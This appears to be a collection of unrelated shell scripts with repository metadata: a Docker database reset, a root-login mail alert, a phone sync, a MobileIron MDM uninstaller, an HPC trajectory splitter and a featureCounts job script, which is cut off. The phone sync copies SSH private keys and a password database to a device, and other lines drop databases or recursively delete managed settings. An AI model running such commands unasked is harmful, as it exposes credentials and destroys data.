    prompt "type NUKE in all caps: " nuked
    [[ ${nuked:-n} == 'NUKE' ]] || exit 1
    docker-compose run -e DISABLE_DATABASE_ENVIRONMENT_CHECK=$DISABLE_DATABASE_ENVIRONMENT_CHECK --rm web \
      bundle exec rake db:drop
  fi
  message "Creating new database"
  docker-compose run --rm web \
    bundle exec rake db:create
  docker-compose run -e CANVAS_LMS_STATS_COLLECTION=$CANVAS_LMS_STATS_COLLECTION --rm web \
    bundle exec rake db:initial_setup
}
create_db
| true |
1b26ae362868977ad33884276f9e56bd119bc17c | Shell | socketpy/last-login | /userlogin.sh | UTF-8 | 1,062 | 3.453125 | 3 | [] | no_license | #!/bin/bash
#Script made logger details
#Author: Vinod.N K
#Usage: who logged in via ssh
#Distro : Linux -Centos, Rhel, and any fedora
#
# Installs mailx + sendmail (when absent) and appends a snippet to
# /root/.bashrc that e-mails an alert whenever a root shell is opened.
#Check whether root user is running the script
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
# rpm -q exits non-zero for absent packages, triggering the install branch.
if rpm -q mailx &> /dev/null; then
echo "Mailx is installed..."
else
echo "Installing mailx..." && sudo yum install mailx -y
fi
if rpm -q sendmail &> /dev/null; then
echo "Sendmail is installed..."
else
echo "Installing sendmail"... && sudo yum install sendmail -y
fi
echo "restarting Sendmail..."
sudo /etc/init.d/sendmail restart
read -p "whats is tha mail id? : " mailid
# Append the alert snippet. The escaped quotes/backticks below are expanded
# when .bashrc runs (at every root login), not now; only $mailid is
# substituted at install time.
# NOTE(review): re-running this script appends a duplicate snippet each time
# -- consider guarding the append with a grep check.
echo " #last login configuration by Devops
echo \"Hello System Admin, This for your information. ALERT!!! - Check your Server. There seems to be a Root Shell Access on:\" \`date\` \`who\` | mail -s \"Alert: Root Access from \`who | cut -d\"(\" -f2 | cut -d\")\" -f1\`\" \"$mailid\" " >> /root/.bashrc
echo " userlogin script has been added to the server Thanx for Using"
| true |
30ca24da6e1dd73ef7f9080ae29ad90c5871026c | Shell | MalavVyas/i3updated | /polybar/launch.dash | UTF-8 | 406 | 2.703125 | 3 | [] | no_license | #!/bin/dash
# Relaunch polybar: kill any running instances, then start the "example"
# and "top" bars on every connected monitor (or unqualified when xrandr is
# unavailable).
# Terminate already running bar instances (second pkill catches stragglers).
pkill polybar
pkill polybar
# Give the old processes time to release the bar windows.
sleep 2
# `command -v ... >/dev/null` (POSIX, works in dash) tests for xrandr without
# the old `type "xrandr"` call's chatter leaking onto stdout.
if command -v xrandr > /dev/null 2>&1; then
  for m in $(xrandr --query | grep " connected" | cut -d" " -f1); do
    MONITOR=$m polybar --reload example -r &
    MONITOR=$m polybar --reload top -r &
  done
else
  polybar --reload example -r &
  polybar --reload top -r
fi
# Launch bar1 and bar2
#polybar example -r &
#polybar top -r &
| true |
7fbd25e80002500f4b9e5618c079f982a211b52d | Shell | liu1992yang/cuby4_md_pipeline | /extract_traj/traj_process.sh | UTF-8 | 5,534 | 2.890625 | 3 | [] | no_license | #!/bin/bash
module load anaconda3_4.3.1
PYTHON_FILELIST="$1" PYTHON_INTERVAL="$2" /gscratch/sw/anaconda-4.3.1/python3/bin/python3.6 - << END
import os, subprocess, sys
import functools, itertools
FILELIST= os.environ['PYTHON_FILELIST']
INTERVAL = os.environ['PYTHON_INTERVAL']
assert FILELIST and INTERVAL,'usage: traj_process.sh filelist interval_steps'
def get_prefix(filelist):
    """Read the file-of-filenames and return its non-blank lines, stripped.

    Exits the interpreter with status 1 when the list file cannot be opened.
    """
    try:
        with open(filelist) as fin:
            return [entry.strip() for entry in fin if entry.strip()]
    except OSError:
        print(filelist + 'not found!')
        sys.exit(1)
def file_exist(fname):
    """Return True when *fname* exists; otherwise report it and return False."""
    if os.path.exists(fname):
        return True
    print(fname + ' does not exist')
    return False
def format_tasklist(tasklist):
    """Turn sub-folder names into absolute 'cd ...; cuby4 ...' commands.

    Returns a map object over the commands, or None for an empty/missing
    task list.
    """
    if not tasklist:
        return None
    cwd = os.getcwd()
    template = 'cd {}; cuby4 inp.yaml&>LOG'
    return map(lambda name: template.format(os.path.join(cwd, name)), tasklist)
def charge_multp_temp(prefix, anneal):
    """Parse charge, multiplicity and temperature out of an anneal input file.

    Multiplicity defaults to '1' when the file does not specify it; charge
    and temperature have no default, so a file missing either key still
    raises UnboundLocalError at the return (unchanged from before).
    Returns (charge, multiplicity, temperature) as strings.
    """
    multipl = '1'
    with open(os.path.join(prefix, anneal)) as fin:
        for line in fin:
            # Match on the stripped line so indented keys are recognized too
            # (the original stripped into curr_line but then matched and
            # split the raw line, leaving curr_line unused).
            curr_line = line.strip()
            if curr_line.startswith('charge'):
                charge = curr_line.split(':')[1].strip()
                continue
            if curr_line.startswith('temperature'):
                temp = curr_line.split(':')[1].strip()
                continue
            if curr_line.startswith('multiplicity'):
                multipl = curr_line.split(':')[1].strip()
                continue
    return charge, multipl, temp
def split_traj(prefix,traj,temp,interval_steps, charge, multp):
    """
    interval_steps: int, others: str
    """
    # Walk the concatenated-XYZ trajectory, keeping every interval_steps-th
    # snapshot; for each kept snapshot create a sub-folder holding the
    # geometry and a cuby4 input file, and collect the folder names as the
    # returned task list.
    with open(os.path.join(prefix,traj), 'r') as fin:
        counter = 1
        l1 = fin.readline().strip()
        assert l1, "empty 1st line"
        # First line of an XYZ frame is the atom count; assumed constant
        # across all frames of the trajectory -- TODO confirm.
        atom_number = int(l1)
        print(atom_number)
        # Skip the comment line (index 0 after the count), take the atoms.
        current_snap = list(itertools.islice(fin,1 , atom_number+1))
        #the original 1st line has been read, so skip current 1st line
        # Lines between kept snapshots: interval_steps-1 whole frames of
        # (atom_number+2) lines each, plus the next frame's 2 header lines.
        skip = (atom_number+2)*(interval_steps-1)+2
        tasklist = []
        # `while fin` is always truthy; the loop exits via the break below
        # once islice comes back empty at end-of-file.
        while fin:
            if not current_snap:
                break
            sub_folder = '{}_{}K_snap_{}'.format(prefix, temp, str(counter))
            #(1)mkdir of new folder
            subprocess.run(['mkdir',sub_folder])
            #(2)save geom to prefix_temp_snap_n.xyz
            write_sub(current_snap, atom_number, sub_folder)
            #(3)write inp.yaml
            write_yaml(sub_folder, charge, multp)
            #(4)add one task to tasklist
            tasklist.append(sub_folder)
            counter +=1
            current_snap = list(itertools.islice(fin,skip,skip+atom_number))
        return tasklist
def write_sub(snap, atom_num, sub_folder):
    # Write the snapshot to <sub_folder>/<sub_folder>.xyz, keeping only the
    # first four whitespace-separated fields (element + x, y, z) of each
    # trajectory line. No-op (with a message) when the folder is missing.
    content = map(lambda x: x.strip().split()[:4], snap)
    if not file_exist(sub_folder):
        print(sub_folder + 'has not been made yet')
        return #return nonetype
    with open(os.path.join(sub_folder, sub_folder +'.xyz'),'w') as fout:
        # Minimal XYZ header: atom count followed by a blank comment line.
        fout.write(str(atom_num)+'\n'+'\n')
        fout.write('\n'.join('\t'.join(elem for elem in line) for line in content))
def write_yaml(sub_folder, charge, multipl):
    # Emit the cuby4 PM6 optimization input (inp.yaml) for one snapshot; the
    # geometry file name mirrors the sub-folder name. No-op when the folder
    # is missing. The template is runtime data ({{}} renders a literal {}),
    # so no comments may be added inside the triple-quoted string.
    if not file_exist(sub_folder):
        return
    with open(os.path.join(sub_folder,'inp.yaml'),'w') as fout:
        fout.write('''job: optimize
geometry: {0}
charge: {1}
multiplicity: {2}
maxcycles: 2000
print: timing
interface: mopac
mopac_precise: yes
mopac_peptide_bond_fix: yes
method: pm6
modifiers: dispersion3, h_bonds4
modifier_h_bonds4:
  h_bonds4_scale_charged: no
  h_bonds4_extra_scaling: {{}}
'''.format(sub_folder + '.xyz',charge, multipl))
def process_one_traj(prefix, interval_steps):
    """
    interval_steps: int
    """
    # Locate the anneal input and trajectory file inside the prefix folder,
    # read charge/multiplicity/temperature from the former, then split the
    # latter into per-snapshot optimization jobs. Returns split_traj's task
    # list, or None when the folder or a required file is missing.
    #check if prefix directory exist
    if not file_exist(prefix):
        return #nonetype
    origin_flist = os.listdir(prefix)
    anneal, traj = None, None #initial nonetype
    # Last matching file wins when several anneal*/trajectory* files exist.
    for fn in origin_flist:
        if fn.startswith('anneal'):
            anneal = fn
        if fn.startswith('trajectory'):
            traj = fn
    if not anneal or not traj:
        print('no anneal or traj file found for {}'.format(prefix))
        return
    #get charge mulplicity and temperature
    charge, multp, temp = charge_multp_temp(prefix, anneal)
    #read traj, split up and write subfiles, return tasks for final tasks write out
    return split_traj(prefix, traj, temp, interval_steps, charge, multp)
def write_sbatch(task_number):
    # Write the SLURM driver (pm6_parallel.sh) that runs the generated
    # pm6_tasks list through GNU parallel on one node. The template is
    # runtime data; its two {} placeholders receive the current working
    # directory and $HOME.
    # NOTE(review): task_number is currently unused -- presumably meant to
    # size the job; kept for interface compatibility.
    with open('pm6_parallel.sh', 'w') as fout:
        fout.write('''#!/bin/bash
#SBATCH --job-name=pm6s
#SBATCH --nodes=1
#SBATCH --time=72:00:00
#SBATCH --mem=100Gb
#SBATCH --workdir={}
#SBATCH --partition=ilahie
#SBATCH --account=ilahie
#module load parallel_sql
module load parallel-20170722
module load contrib/mopac16
source {}/.rvm/scripts/rvm
ldd /sw/contrib/cuby4/cuby4/classes/algebra/algebra_c.so > ldd.log
cat pm6_tasks | parallel -j 28
'''.format(os.getcwd(),os.environ['HOME']))
if __name__ == '__main__':
    # Driven by the wrapper shell script via environment variables.
    file_list = FILELIST
    interval = int(INTERVAL)
    prefix_list = get_prefix(file_list)
    print(prefix_list)
    # Split every trajectory listed in the fofn; unprocessable entries
    # yield None, successfully split ones a (possibly empty) list.
    all_tasks = list(map(functools.partial(process_one_traj, interval_steps = interval),prefix_list))
    # Filter on truthiness (not just `is not None`): this also drops *empty*
    # task lists, which previously reached format_tasklist() -- whose None
    # return then crashed the '\n'.join below with a TypeError. Empty lists
    # contribute 0 to the count either way.
    task_number = sum(len(i) for i in all_tasks if i)
    with open('pm6_tasks','w') as fout:
        fout.write('\n'.join('\n'.join(format_tasklist(i)) for i in all_tasks if i))
    write_sbatch(task_number)
    sys.exit()
END
# Capture the heredoc'd Python's exit status before testing it: the original
# printed "failure:$?" AFTER `[[ $? = 0 ]]` had already consumed $?, so it
# always reported the test's own status (1) instead of the real exit code.
status=$?
if [[ $status -eq 0 ]]; then
        echo "Please run sbatch pm6_parallel.sh for parallel pm6 optimization"
        echo "change partition name and run time if needed"
        echo "tasklist is stored in 'pm6_tasks'"
else
        echo "failure:$status"
fi
| true |
1d8d2efcea320b31cbaba6ffcfd5001a2f1d0cbc | Shell | mattcaron/media_management | /sync_phone | UTF-8 | 422 | 2.828125 | 3 | [] | no_license | #!/bin/bash
# Sync with an Android phone mounted at /media/matt/PHONE: push password DB
# and ssh keys, pull new camera photos, then archive the camera roll into
# the phone's gallery folder.
BASEDIR=/media/matt/PHONE
PICS=$BASEDIR/DCIM/100KYCRA/
# Push the KeePassX database and ssh identities onto the phone.
# NOTE(review): this copies *private* keys (id_*) to removable media --
# confirm that is intended and the phone storage is trusted/encrypted.
cp -a ~/.keepassx/* $BASEDIR/keepassx/.
cp -a ~/.ssh/id_* $BASEDIR/ssh/.
echo pulling pics
# -L follows symlinks; --inplace avoids temp copies on the slow medium.
rsync -aLh --inplace "$PICS" "$HOME/workspace/pics/photos/new"
echo moving pics to gallery
# Empty the camera folder into the phone-side gallery once pulled.
mv "$PICS"/* "$BASEDIR/pics/."
echo done
echo Is it time to run a backup with adb?
echo If so, do it, then plug it in to the computer and run backup_phone.
echo Bye!
| true |
5902228802035473a9b918fb774520e4e763979b | Shell | pmuthubalu/my_repo_files | /remove.sh | UTF-8 | 1,208 | 3.203125 | 3 | [] | no_license | #!/bin/sh
# Uninstall the MobileIron MISR agent for the logged-in macOS user: remove
# managed preferences and agent data, unload/remove the user and root
# launchd jobs, and delete their plist files. All expansions are quoted so
# user names / paths containing spaces cannot word-split (the old script
# left several of them unquoted).
USER=$(logname)
if [ -z "$USER" ]; then
	echo "no user found"
	exit 1
fi
echo "Current user is $USER"
MISR_DAEMON_PATH="/Library/LaunchDaemons/com.mobileiron.mac.misr.root.plist"
MISR_USER_DAEMON_PATH="/Users/$USER/Library/LaunchAgents/com.mobileiron.mac.misr.user.plist"
CHECKIN_AGENT_DAEMON_PATH="/Users/$USER/Library/LaunchAgents/com.mobileiron.mac.checkinAgent.plist"
echo "Remove /Library/Managed Preferences/$USER/..."
sudo rm -R "/Library/Managed Preferences/$USER/"
echo "Remove com.mobileiron.mac.agent..."
rm -R "/Users/$USER/Library/Application Support/com.mobileiron.mac.agent/"
echo "Try to unload user's daemons..."
launchctl unload "$MISR_USER_DAEMON_PATH"
launchctl unload "$CHECKIN_AGENT_DAEMON_PATH"
echo "Remove user's daemons..."
launchctl remove com.mobileiron.mac.misr.user
launchctl remove com.mobileiron.mac.checkinAgent
if [ -f "$CHECKIN_AGENT_DAEMON_PATH" ]; then
	rm -f "$CHECKIN_AGENT_DAEMON_PATH"
fi
if [ -f "$MISR_USER_DAEMON_PATH" ]; then
	rm -f "$MISR_USER_DAEMON_PATH"
fi
echo "Remove root's daemons..."
sudo launchctl unload "$MISR_DAEMON_PATH"
sudo launchctl remove com.mobileiron.mac.misr.root
if [ -f "$MISR_DAEMON_PATH" ]; then
	sudo rm -f "$MISR_DAEMON_PATH"
fi
| true |
5560e637e4a7a26e53b7765c87724de5fc5fe5cd | Shell | alces-software/oztemplates-openstack | /bin/centos7.0.sh | UTF-8 | 2,433 | 3.109375 | 3 | [] | no_license | #!/bin/bash
################################################################################
# (c) Copyright 2007-2014 Alces Software Ltd                                   #
#                                                                              #
# Symphony Software Toolkit                                                    #
#                                                                              #
# This file/package is part of Symphony                                        #
#                                                                              #
# Symphony is free software: you can redistribute it and/or modify it under    #
# the terms of the GNU Affero General Public License as published by the Free  #
# Software Foundation, either version 3 of the License, or (at your option)    #
# any later version.                                                           #
#                                                                              #
# Symphony is distributed in the hope that it will be useful, but WITHOUT      #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or        #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License  #
# for more details.                                                            #
#                                                                              #
# You should have received a copy of the GNU Affero General Public License     #
# along with Symphony. If not, see <http://www.gnu.org/licenses/>.             #
#                                                                              #
# For more information on the Symphony Toolkit, please visit:                  #
# http://www.alces-software.org/symphony                                       #
#                                                                              #
################################################################################
# Build the CentOS 7.0 base image with Oz.
# Usage: centos7.0.sh <image-name>
if [ -z "$1" ]; then
    echo "Please specify image name" >&2
    exit 1
fi
export IMAGE_NAME=$1
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Load pool/bridge settings unless the caller already provided POOL_PATH.
if [ -z "$POOL_PATH" ]; then
    . "$DIR/../etc/vars"
else
    echo "Skip loading config"
fi
# mktemp gives an unpredictable name (the old /tmp/oz.cfg.$$ was guessable
# and open to symlink tricks); exported so the child script can read it.
OZ_CONFIG=$(mktemp /tmp/oz.cfg.XXXXXX) || exit 1
export OZ_CONFIG
echo "Prepare.."
# Instantiate the Oz config template with the configured pool path & bridge.
sed -e "s|%POOL_PATH%|$POOL_PATH|g" \
    -e "s/%EXT_BRIDGE%/$EXT_BRIDGE/g" "$DIR/../config/oz.cfg.template" > "$OZ_CONFIG"
"$DIR/../centos/7.0/centos7.0-minimal.sh"
echo "Cleanup.."
rm -f "$OZ_CONFIG"
| true |
a4662ffb7a536faf2b04baf9bc8b253271ad2fde | Shell | swarna04/aepsdk-edge-ios | /tools/git-hooks/setup.sh | UTF-8 | 245 | 2.859375 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
# Install the pre-commit hook so the code formatter runs before every commit.
# Expansions are quoted so repository paths containing spaces work.
GIT_HOOKS_DIR=$(dirname "$0")
# Resolve the .git directory; abort if we are not inside a git repository —
# otherwise GIT_DIR would be empty and the copy would target "/hooks".
GIT_DIR=$(git rev-parse --git-dir) || exit 1
cp "$GIT_HOOKS_DIR/pre-commit" "$GIT_DIR/hooks"
chmod +x "$GIT_DIR/hooks/pre-commit"
| true |
eadd0923ca9dc8abfa410001d842f8865a8e3122 | Shell | alexras/themis_tritonsort | /src/scripts/valsort/shell_scripts/run_validation_scripts.sh | UTF-8 | 450 | 4.21875 | 4 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
set -e
# Make an unmatched *.sh glob below a hard error instead of a literal string.
shopt -s failglob
if [ $# -ne 1 ]
then
    echo "Usage: $(basename "$0") output_dir"
    exit 1
fi
OUTPUT_DIR=$1
if [ ! -d "$OUTPUT_DIR" ]
then
    echo "Output directory $OUTPUT_DIR doesn't exist."
    exit 1
fi
# Launch every generated validation script in parallel.
for SCRIPT in "${OUTPUT_DIR}"/*.sh
do
    # Run the script but squash stdout and stderr
    echo "Running $SCRIPT"
    "$SCRIPT" >/dev/null 2>&1 &
done
# Wait for all scripts to finish.
wait
| true |
02d00c8cbc2d86c1503e90c1a027ce243e89de47 | Shell | misund/dotfiles | /.bashrc | UTF-8 | 2,623 | 3.015625 | 3 | [] | no_license | # ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
RED='\033[0;31m'
NOCOLOR='\033[0m' # No Color
# %b expands the backslash escapes stored in the variables; putting variables
# straight into the printf format string is fragile (SC2059).
printf '%b<3%b\n' "$RED" "$NOCOLOR"
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# don't overwrite GNU Midnight Commander's setting of `ignorespace'.
export HISTCONTROL=$HISTCONTROL${HISTCONTROL+,}ignoredups
# ... or force ignoredups and ignorespace
export HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi
# Prompt and title
if [ -f ~/.bash_prompt ]; then
    . ~/.bash_prompt
fi
if [ -f ~/.bash_kubecontext ]; then
    . ~/.bash_kubecontext
fi
# Define colors in less (man uses less for paging by default)
if [ -f ~/.less_colors ]; then
    . ~/.less_colors
fi
# Alias definitions.
if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi
# NPM script completion, e.g. `npm run clean`
if [ -f ~/.bash_npm_completion ]; then
    . ~/.bash_npm_completion
fi
# Force UTF-8 output
export LANG=en_US.UTF-8
# gief utf8
export LC_ALL=en_US.utf8
# New files should be 0755 (u=rwx, g=rx, o=rx)
umask 022
#------------------------------------------------------------
# Path
#------------------------------------------------------------
# kubectl completion, pls
# The completion must be sourced in the *current* shell; the old subshell
# wrapper "( source ... )" defined the completions there and threw them away.
command -v kubectl >/dev/null 2>&1 && source <(kubectl completion bash)
# execute files in $HOME/bin
PATH="$HOME/bin:$PATH"
# Add Jena to Java's CLASSPATH
export CLASSPATH=$CLASSPATH:$HOME/bin/Jena-2.6.4/bin
# Add RVM to PATH for scripting
#PATH="$HOME/.gem/ruby/1.9.1/bin:$PATH"
PATH=$PATH:$HOME/.rvm/bin
# Add NVM to PATH for scripting
[[ -s $HOME/.nvm/nvm.sh ]] && . $HOME/.nvm/nvm.sh # This loads NVM
[[ -r $NVM_DIR/bash_completion ]] && . $NVM_DIR/bash_completion # Bash completion for NVM
export NODE_PATH=$NODE_PATH:$HOME/.npm/lib/node_modules # Put NPM root value in node path
export PATH=$PATH:~/.npm/bin # run node modules' executables (like grunt)
# Start tmux
# Only exec into tmux when it is installed and we are not already inside one;
# exec-ing a missing command would terminate the shell.
command -v tmux >/dev/null 2>&1 && [[ -z "$TMUX" ]] && exec tmux
| true |
37f76eb3b2f37b8f4f2920ced8241ba3fbf640e4 | Shell | yamamoto-febc/s3cmd-docker | /entrypoint.sh | UTF-8 | 537 | 3.453125 | 3 | [] | no_license | #!/bin/sh
set -e
#
# main entry point to run s3cmd
#
S3CMD_PATH=/opt/s3cmd/s3cmd
#
# Check for required parameters
#
if [ -z "${ACCESS_KEY}" ]; then
  echo "ERROR: The environment variable ACCESS_KEY is not set." >&2
  exit 1
fi
if [ -z "${SECRET_KEY}" ]; then
  echo "ERROR: The environment variable SECRET_KEY is not set." >&2
  exit 1
fi
# Build the s3cmd configuration: the shared base config plus the credentials
# supplied through the environment. The grouped block opens /.s3cfg once.
{
  echo ""
  cat /opt/base_s3cfg
  echo ""
  echo "access_key=${ACCESS_KEY}"
  echo "secret_key=${SECRET_KEY}"
} > /.s3cfg
# exec so s3cmd replaces this shell and receives signals directly
# (proper PID 1 semantics for a container entrypoint).
exec "${S3CMD_PATH}" --config=/.s3cfg "$@"
| true |
14c1a10fecb2698d210f38367dbeaba98830fb46 | Shell | guardian/parking-lot | /docker-debug.sh | UTF-8 | 729 | 3.859375 | 4 | [] | no_license | #!/bin/bash
# Absolute path of the directory containing this script.
ROOT_DIR=$(cd "$(dirname "$0")" && pwd)
DOCKER_NAME=parking-lot:latest
# Boot docker
echo "Booting container..."
# Start apache inside the image and keep a shell running so we can attach.
if docker run -d -t -i -v "$ROOT_DIR/sites":/etc/apache2/sites-enabled -p 18080:80 "$DOCKER_NAME" /bin/bash -c 'source /etc/apache2/envvars; /usr/sbin/apache2; /bin/bash'; then
  sleep 2
  # Look the container up by image name; pass the name to awk via -v instead
  # of splicing it into the program text.
  CONTAINER_ID=$(docker ps | awk -v name="$DOCKER_NAME" '$0 ~ name {print $1}')
  if [ -z "$CONTAINER_ID" ]; then
    echo "Can't find running container"
  else
    # Run test scripts
    echo "Attaching to container..."
    docker attach "$CONTAINER_ID"
  fi
fi
echo "Cleaning up..."
# CONTAINER_ID is empty when the run or lookup failed; skip cleanup then.
if [ -n "$CONTAINER_ID" ]; then
  docker stop "$CONTAINER_ID" >/dev/null
  docker rm -f "$CONTAINER_ID" >/dev/null
fi
| true |
3141091a8abbaaa1ee69ce3b088ca264e0683cac | Shell | gkanwar/ctf2020 | /infra/00_make_easyrsa_certs_and_keys.sh | UTF-8 | 1,496 | 3.203125 | 3 | [] | no_license | #!/bin/bash
### CA lives centrally on the gameserver.
### -- server.{crt,key} for gameserver
### -- teamX.{crt,key} for vulnboxes as ovpn clients to gameserver
### -- teamX_server.{crt,key} for vulnboxes as ovpn servers to members
### -- teamX_Y.{crt,key} for members as ovpn clients to vulnboxes
# Abort if the easy-rsa workspace is missing; otherwise every ./easyrsa call
# below would silently run in the wrong directory.
cd /etc/openvpn/easy-rsa || exit 1
if [[ "$INIT" == "1" ]]; then # one-time init
  sudo ./easyrsa init-pki
  sudo ./easyrsa build-ca nopass # can add pass if you like feeling secure
fi
# Required environment: team/member counts and the id of the NOP team.
if [[ -z "$NUM_TEAMS" ]]; then
  echo "Must set NUM_TEAMS" >&2
  exit 1
fi
if [[ -z "$NUM_MEMBERS" ]]; then
  echo "Must set NUM_MEMBERS" >&2
  exit 1
fi
if [[ -z "$NOP_ID" ]]; then
  echo "Must set NOP_ID" >&2
  exit 1
fi
# All team ids: the NOP team plus teams 1..NUM_TEAMS (numeric, so the
# unquoted seq expansion is safe).
TEAMS=("${NOP_ID}" $(seq 1 "${NUM_TEAMS}"))
# Generate requests
sudo ./easyrsa --batch --req-cn=server gen-req server nopass
for t in "${TEAMS[@]}"; do
  sudo ./easyrsa --batch --req-cn=team${t} gen-req team${t} nopass
  sudo ./easyrsa --batch --req-cn=team${t} gen-req team${t}_server nopass
  for i in $(seq 1 "${NUM_MEMBERS}"); do
    sudo ./easyrsa --batch --req-cn=team${t}_${i} gen-req team${t}_${i} nopass
  done
done
# Sign requests
sudo ./easyrsa --batch sign-req server server
for t in "${TEAMS[@]}"; do
  sudo ./easyrsa --batch sign-req client team${t}
  sudo ./easyrsa --batch sign-req server team${t}_server
  for i in $(seq 1 "${NUM_MEMBERS}"); do
    sudo ./easyrsa --batch sign-req client team${t}_${i}
  done
done
# DH params for the servers
sudo ./easyrsa --batch gen-dh
| true |
e71df7f26045dba0620f7d3e1136b18fe3b26a64 | Shell | Lfarioli/Postgres | /PostgresErcole/ercolepg.sh | UTF-8 | 1,045 | 3.328125 | 3 | [] | no_license | #!bin/bash
# SQL/helper scripts used to assemble the Ercole PostgreSQL report.
PSU1='/tmp/check_version.sql'         # version probe for PostgreSQL > 8.4
PSU2='/tmp/check_version_8.4.sql'     # version probe for PostgreSQL 8.x
MPARAM='/tmp/get_param.sql'           # instance-wide memory parameters
DBPARAM1='/tmp/query_each_db.sql'     # per-database query (modern servers)
DBPARAM2='/tmp/query_each_db_8.4.sql' # per-database query (8.x servers)
SCHEMAPARAM='/tmp/take_schema.sh'     # helper that dumps schema information
OUTPUTFILE='/tmp/final.final'         # aggregated report file
# Major version digit of the local psql client ("8", "9", ...).
VERSION=$(psql -V | grep psql | awk '{print $3}' | cut -c1-1)

# Append the server-version probe result to the report.
get_version () {
    if [ "$VERSION" = "8" ]; then
        # Run psql directly; the old "$( psql ... )" wrapper tried to execute
        # the query output as a command (SC2091).
        psql -c "create language plpgsql;"
        VERSION8=$(psql -At <"$PSU2" | grep 2)
        echo "$VERSION8" >> "$OUTPUTFILE"
    else
        VERSIONMORE=$(psql -At <"$PSU1" | grep NOT)
        echo "$VERSIONMORE" >> "$OUTPUTFILE"
    fi
}

# Append the instance-wide memory parameters to the report.
memory_parameter () {
    local memp
    memp=$(psql -tx <"$MPARAM")
    echo "$memp" >> "$OUTPUTFILE"
}

# Append the per-database query output to the report, picking the SQL file
# that matches the server generation.
db_parameter () {
    # Use a local result variable: the original assigned the query output back
    # into DBPARAM1/DBPARAM2, clobbering the script paths.
    local result
    if [ "$VERSION" = "8" ]; then
        result=$(psql -tx <"$DBPARAM2")
    else
        result=$(psql -tx <"$DBPARAM1")
    fi
    echo "$result" >> "$OUTPUTFILE"
}

# Run the schema-dump helper and append its report.
schema_parameter () {
    # Plain invocation; "$( ... )" around these commands was another
    # execute-the-output bug.
    sh "$SCHEMAPARAM"
    cat final_report.txt >> "$OUTPUTFILE"
}

schema_parameter
db_parameter
#get_version
memory_parameter
| true |
7c5018a174864faf46fae0f9d209b20fc3879337 | Shell | Abhishek-Prusty/Bomberman-Game-Terminal | /run.sh | UTF-8 | 448 | 3.1875 | 3 | [] | no_license | #!/bin/bash
# Absolute directory containing this script.
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Number of logical CPUs: one "processor" line per CPU in /proc/cpuinfo
# (single grep -c instead of the old cat | grep | wc -l pipeline).
NOFCPU=$(grep -c processor /proc/cpuinfo)
START='/sys/devices/system/cpu/cpu'
END='/cpufreq/scaling_governor'
# Remember each CPU's current cpufreq governor so it can be restored later.
declare -a ORIGOVS
for ((I = 0; I < NOFCPU; I++)); do
    j=$START$I$END
    ORIGOVS[$I]=$(cat "$j")
done
# Pin every CPU to the "performance" governor while the game runs
# (writing scaling_governor requires root).
for ((I = 0; I < NOFCPU; I++)); do
    j=$START$I$END
    echo performance > "$j"
done
python "$DIR/bomberman.py"
# Restore the governors that were active before the game started.
for ((I = 0; I < NOFCPU; I++)); do
    j=$START$I$END
    echo "${ORIGOVS[$I]}" > "$j"
done
| true |
0997280da7f734c8c815b40a44966967988f6925 | Shell | ericorosel/Pi_grammer | /SPI_EEPROM_PROGRAMMING/ATMEL_PROGRAMMING/pi_eeprom_program.sh | UTF-8 | 536 | 3.0625 | 3 | [] | no_license | #!/bin/bash
echo "Programming EEPROM..."
# get firmware file name — find already prints the absolute path, so the old
# "$eeprom_set .= ..." line (PHP-style concatenation, which actually tried to
# execute the path as a command) is dropped. Use only the first match if
# several .hex files are present.
eeprom_set=$(find /home/pi/eeprom -maxdepth 1 -type f -name '*.hex' | head -n 1)
if [ -z "$eeprom_set" ]; then
    echo "No .hex file found in /home/pi/eeprom" >&2
    exit 1
fi
#CHIP
DEVICE=atmega328p
# hard toggle of reset line, necessary to see successful programming on fresh ICs
sudo gpio -g mode 26 output
sudo gpio -g write 26 0
sleep 0.1
sudo gpio -g write 26 1
sleep 0.1
#program eeprom
sudo avrdude -p "$DEVICE" -C /home/pi/avrdude_gpio.conf -c linuxspi -P /dev/spidev0.0 -b 1000000 -D -v -u -U "eeprom:w:${eeprom_set}:i" 2>/home/pi/eeprom_results.txt
| true |
9004b11378db2f7020040eacb0b4e9ed2086c9ce | Shell | DanCF93/Cardo-et-al-2021 | /Sequencing_alignment/bin/4a_featurecount.sh | UTF-8 | 2,793 | 3.046875 | 3 | [] | no_license | #!/bin/bash
# Generate and submit a PBS array job that runs featureCounts on both the
# markdup and rmdup BAMs of every sample listed by read_param.sh.
scriptName="4a_featurecount"
jobName="4a"
jobMemory="8G"
jobLength="05:00:00"
myDir=$(pwd)
# Analysis-run number: the digits following "an0" in the working directory.
tmp=$( echo $myDir | sed "s/.*an0\([0-9]\+\).*/\1/p" -n )
jobName=${jobName}.${tmp}
# Pipeline parameters supplied by the project's read_param.sh helper.
sampleNames=($(${myDir}/read_param.sh sampleNames))
sampleNumber=${#sampleNames[@]}
refGTF=$(${myDir}/read_param.sh refGTF)
project=$(${myDir}/read_param.sh arccaProject)
queue=$(${myDir}/read_param.sh arccaBatchQueue)
moduleSAMTools=$(${myDir}/read_param.sh moduleSAMTools)
moduleFeatureCounts=$(${myDir}/read_param.sh moduleFeatureCounts)
# Fresh stdout/stderr directories and job script for this step.
[ -d OUT/${scriptName}/ ] || mkdir OUT/${scriptName}/ ; rm -f OUT/${scriptName}/*
